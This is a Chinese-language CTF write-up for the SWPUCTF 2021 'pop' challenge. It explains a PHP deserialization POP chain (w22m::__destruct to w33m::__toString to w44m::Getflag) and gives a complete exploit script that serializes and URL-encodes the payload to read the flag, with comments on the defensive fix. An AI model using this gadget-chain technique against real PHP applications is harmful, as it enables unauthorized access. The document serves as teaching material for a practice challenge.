[SWPUCTF 2021 新生赛]pop
~~你这个取名真的可以的~~ 1. 审计源码 2. 寻找pop链
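知识点: 变量后面加括号是动态调用 —— PHP 会把变量的值当作函数(或方法)名来调用
$abc = 'asd';
$abc('x');
等价于
asd('x');
本题 w33m::__toString 里的 $this->w00m->{$this->w22m}() 是同一种写法: 被调用的对象和方法名都取自属性。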
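unserialize -> w22m.__destruct -> w33m.__toString -> w44m.Getflag
(注意: unserialize 不会调用 __construct, 对象的属性值直接取自序列化数据; 下面 exp 里的 w22m / w33m / w44m 的 __construct 只是在本地生成 payload 时用来把 w00m、w22m、admin、passwd 填成需要的值)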
- 编写exp
<?php
/**
 * Innermost object of the serialized graph.
 *
 * Presumably mirrors the class of the same name in the challenge source; only
 * the property names, their visibility and their values end up in the payload.
 */
class w44m
{
    // Visibility is part of the serialized form: a private property is stored
    // as "\0w44m\0admin" and a protected one as "\0*\0passwd", so both must be
    // declared exactly like this for the names to line up after unserialize().
    private $admin = 'aaa';
    protected $passwd = '123456';

    /**
     * Replaces the declared defaults with the pair that Getflag() compares against.
     */
    public function __construct()
    {
        $this->passwd = '08067';
        $this->admin = 'w44m';
    }

    /**
     * Echoes $flag from flag.php when both properties hold the expected values;
     * otherwise echoes the two properties followed by 'nono'.
     */
    public function Getflag()
    {
        $matches = $this->admin === 'w44m' && $this->passwd === '08067';

        if (!$matches) {
            echo $this->admin, $this->passwd, 'nono';
            return;
        }

        // The check above only reads object state, and that state is whatever
        // the serialized data supplied when the object came from unserialize().
        include 'flag.php';
        echo $flag;
    }
}
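/**
 * Middle link of the object graph: converting an instance to a string calls a
 * method on $w00m whose name is taken from $w22m.
 *
 * Both the receiver and the method name are plain properties, so after
 * unserialize() they hold whatever the serialized data contained. Not
 * dispatching on deserialized property values, and not passing request data to
 * unserialize() at all (json_decode(), or the allowed_classes option), removes
 * this link.
 */
class w33m
{
    public $w00m;
    public $w22m;

    /**
     * Prepares the two properties for payload generation: the receiver is a
     * w44m instance and the method name is "Getflag".
     */
    public function __construct()
    {
        $this->w22m = "Getflag";
        $this->w00m = new w44m;
    }

    /**
     * Invokes the method named by $w22m on the object in $w00m, then yields '0'.
     *
     * @return string always '0'
     */
    public function __toString()
    {
        // Variable method call: receiver and method name are both read from properties.
        $this->w00m->{$this->w22m}();

        // __toString() has to return a string. An int here only works where PHP
        // coerces it (PHP 8 in weak mode); older versions and strict_types
        // reject it. The string '0' gives the same output everywhere.
        return '0';
    }
}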
/**
 * Outermost object of the graph and the entry point of the chain: its
 * destructor echoes $w00m, which forces a string conversion of whatever object
 * is stored there.
 *
 * __destruct() runs automatically when the object is released, so any code
 * path that unserializes this class from request data reaches the echo without
 * calling anything explicitly.
 */
class w22m
{
    public $w00m;

    /**
     * Stores a w33m instance so the serialized graph is w22m -> w33m -> w44m.
     */
    public function __construct()
    {
        $this->w00m = new w33m();
    }

    /**
     * Prints $w00m; if it holds an object, PHP calls that object's __toString().
     */
    public function __destruct()
    {
        print $this->w00m;
    }
}
// Build the object graph once; the constructors fill in every property.
// The variable keeps the object alive until the script ends, so
// w22m::__destruct also runs locally, after the line below has been printed
// (without a local flag.php that shows up as PHP warnings after the payload).
$chain = new w22m();

// serialize() emits NUL bytes around the names of w44m's private and protected
// properties; urlencode() turns them into %00 so the value survives in a query string.
$query = "?w00m=" . urlencode(serialize($chain));
echo $query;
?>